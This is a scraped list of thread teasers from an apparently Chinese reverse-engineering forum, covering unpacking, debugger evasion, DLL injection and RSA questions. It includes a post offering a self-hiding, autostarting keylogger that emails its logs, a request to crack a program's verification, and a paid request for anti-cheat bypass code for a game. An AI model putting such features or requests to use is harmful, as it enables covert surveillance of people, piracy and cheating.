Clik here to view.
【求助】请问这壳是怎么加的?为什么用od调试就报错
我想吧这个程序的验证机制给破解掉,结果用od加载就报错,用pe查壳又好像没壳。但实际作者应该给pe文件头加密了。不知道各位大侠有没破解的办法?求指导 上传的附件 PB DeCompiler.part1.rar (2.86 MB) PB DeCompiler.part2.rar (1.60 MB)
View ArticleClik here to view.
【转帖】用VB写OD插件-数据代码轨迹记录.
:eek: 在某网站上看到的,只有截图(目前还在完善中,似乎要将OD的数据重新解释了,并且是专门针对分析 游戏进程的数据用的,协助调试者快速分析游戏进程函数CALL和游戏进程变态跳转BT功能)。原理是他说是挂钩了OD的一些代码,导出了寄存器数值等,同步到VB程序上。试图将作者的调试游戏分析的思路贯穿到此插件上,利用VB程序对 OD的数据进行新的解释来协助调试分析。...
View Article【求助】section .tp0 这个是怎么回事呢
有一个DLL组件,用工具脱壳后,用PEID扫描显示是VC6编写的工具 用PEView打开后,发现有section .tp0, section .tp1 ,这两个不常见的节,是否还有什么隐藏的壳呢?? 初学,请大佬给予指点一二。。。:o::o::o::cool::cool:
View Article【讨论】关于微软COM组件速度运行最快的方式
关于微软COM组件速度运行最快的方式 既然COM组件是以二进制的形式分发,那么VB和VC创建的COM组件在速度上有什么不同呢? VC编写的相对 快点么》:eek::eek::eek::eek:
View Article【求助】RSA可以通过模数和指数来还原私钥么?
RT 因为看到java里面有方法可以: RSAPrivateKeySpec spec = new RSAPrivateKeySpec(mod, exp); KeyFactory keyFactory = KeyFactory.getInstance("RSA"); java.security.PrivateKey signKey = keyFactory.generatePrivate(spec);...
View Article【求助】请问ZP在XP下脱了壳在Win7下不能使用是什么原因呢。
在XP下用的好好的,在WIn7下就会 无法定位序数498于动态链接库advapi32.dll上。 这个是不是因为XP和WIN7的这个DLL不一样呢,怎么修改它呢。 刚才的问题已经解决了。 现在问题又来了。
View Article【求助】怎样获取网页中按钮的点击状态呢
如题.. 在一个网页中有一个按钮.. 要怎样获取这个按钮的点击状态呢? 在点击这个按钮的时候 应该会产生 一个按钮状态吧? 求高人指点 具体应该怎么做.. :3::3:
View Article【求助】科瑞 or 15pb
科瑞培训1年 2.1w学费 15pb培训5个月1.6w学费 | 有去过的兄弟来说说里面效果如何?不知道如何抉择是培训逆向或者反病毒的课程,还有就是不知道反病毒工程师跟逆向工程师的起薪如何
View ArticleClik here to view.
【原创】发一个本人用delphi做的健盘记录工具
1.实现程序开启就隐藏。 2.实现复制到系统目录并开机运行程序。 3.开启程序就自动发送邮件 4.运行10分钟发送邮件,再一天一次 5.发送完邮件就删除记录。 6.修改INI文件来更改收发件人 7.第一次运行请修改一下INI文件 上传的附件 SourceCode.zip (312.6 KB) keyboardRecordV1.rar (241.2 KB)
View ArticleClik here to view.
【求助】OD无法过Safengine shielden 2.2检测
如图片这样 在OD里面一运行就出现请关闭调试或监控工具后再试 这个怎么解决啊? 最好能有大神教教我怎么破解加了这种课的方法 谢谢了 上传的图像 1.jpg (110.0 KB) 2.jpg (99.7 KB)
View Article【求助】RMB悬赏,求购一款能过能过TP的源码,用作学习。要C++的
RMB悬赏,请高手推荐,或求购一款能过能过DNF TP的源码,用作学习。 1. 最好是C++语言开发 2.至少带一个简单的功能, 如改血等
View Article【求助】怎么判断软件是否加壳。
我用OD把程序打开了,也能调试,那就说明这个程序没加壳,可以这么理解吗? 但是我发现两个现象,一个是我用CTRL+F9无法正常返回函数,老跑到NTDLL.KISYSTEMCALLRET(好像是这么拼写吧)结束了,或者直接退出了,我根据OD的提示说出现异常,我就SHIFT+F9跳过,但是程序报错了。 第二个我搜索所有参考字符串,发现一个字符ASPACK,难道程序用了这个壳。...
View ArticleClik here to view.
【求助】用dll注入下扫雷,扫雷运行不了了
在KSSD上学习dll注入,用dll注入实现下自动扫雷,可是扫雷怎么也运行不了了,原来备份的文件也无法运行,一运行cpu就50%,OD加载也不动,求大神解释! 上传的附件 winmine.rar (63.0 KB)
View ArticleClik here to view.
【求助】程序没到入口点级执行ntdll.KiFastSystemCallRet
什么意思?我是用OD打开的程序,我在入口点断点,但是没执行就退出了。 EIP 77C970F4 ntdll.KiFastSystemCallRet 请大神帮忙。 上传的附件 hpUFO.part1.rar (1,000.0 KB) hpUFO.part2.rar (1,000.0 KB) hpUFO.part3.rar (126.4 KB)
View ArticleClik here to view.
【分享】一段反动态调试代码
代码: __asm { _emit 0xD9 _emit 0xD8 _emit 0xDF _emit 0xDF _emit 0xDF _emit 0xDF...
View Article【求助】内存数据共享问题!望得到思路指点,谢谢!
一个程序(就当它是一个驻留服务吧!)将某数据结构的一个变量在内存中供其它程序读取。 能实现吧?实现的思路是什么? 操作系统windows /* 我记得不同的程序在windows中有不同的内存空间。这种打通内存地址隔膜的共享貌似不可行。 但我想在磁盘上共享数据那算不得什么,而且相比较在内存中而言速度要慢得多。况且现在业界有内存数据库的产品(虽然我没研究其原理)。应该是可以做到的。...
View ArticleClik here to view.
【求助】 DeFoxIV 混淆加密的VFP软件,能OD调试。想做内存补丁可以吗?
有个网络验证的软件用DeFoxIV 混淆加密过。 OD可以调试下断点 我想用 bp recv 查它的解密CALL后面的 明文变量,直接用内存补丁赋值这个变量,有没有可能? 附件 82627 附件 82628 上传的图像 QQ截图20130910090652.jpg (17.1 KB) QQ图片20130910150501.jpg (12.8 KB)
View Article